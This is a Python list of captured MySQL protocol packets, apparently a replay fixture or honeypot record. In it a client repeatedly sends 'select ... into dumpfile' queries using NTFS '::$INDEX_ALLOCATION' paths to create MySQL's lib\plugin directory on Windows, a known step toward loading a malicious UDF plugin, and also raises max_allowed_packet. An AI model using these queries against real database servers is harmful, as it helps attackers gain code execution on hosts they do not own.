stream = [('out', b'4\x00\x00\x00\x0a5.7.16\x00\x00\x00\x12gaaaaaaaa\x00,\xa2!\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00            \x00'),
('in', b'(\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00mysqld\x00\x00'),
('out', b'\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00'),
('in', b'?\x00\x00\x00\x03select \x27xxx\x27 into dumpfile \x27C:\x5c\x5cMySQL\x5c\x5clib::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'G\x00\x00\x00\x03select \x27xxx\x27 into dumpfile \x27C:\x5c\x5cMySQL\x5c\x5clib\x5c\x5cplugin::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b':\x00\x00\x00\x03select \x27xxx\x27 into dumpfile \x27..\x5c\x5clib\x5c\x5c::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'B\x00\x00\x00\x03select \x27xxx\x27 into dumpfile \x27..\x5c\x5clib\x5c\x5cplugin\x5c\x5c::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b':\x00\x00\x00\x03select \x27xxx\x27 into dumpfile \x27%mysql%\x5c\x5c::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'B\x00\x00\x00\x03select \x27xxx\x27 into dumpfile \x27%mysql%\x5c\x5cplugin\x5c\x5c::$INDEX_ALLOCATION\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'q\x00\x00\x00\x03select \x27xxx\x27 into dumpfile \x27@@plugin_dir,\x27\x5c\x5c::$INDEX_ALLOCATION\x27;\x0aset global max_allowed_packet=524288000;\x0aexit;'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x01\x00\x00\x00\x01')]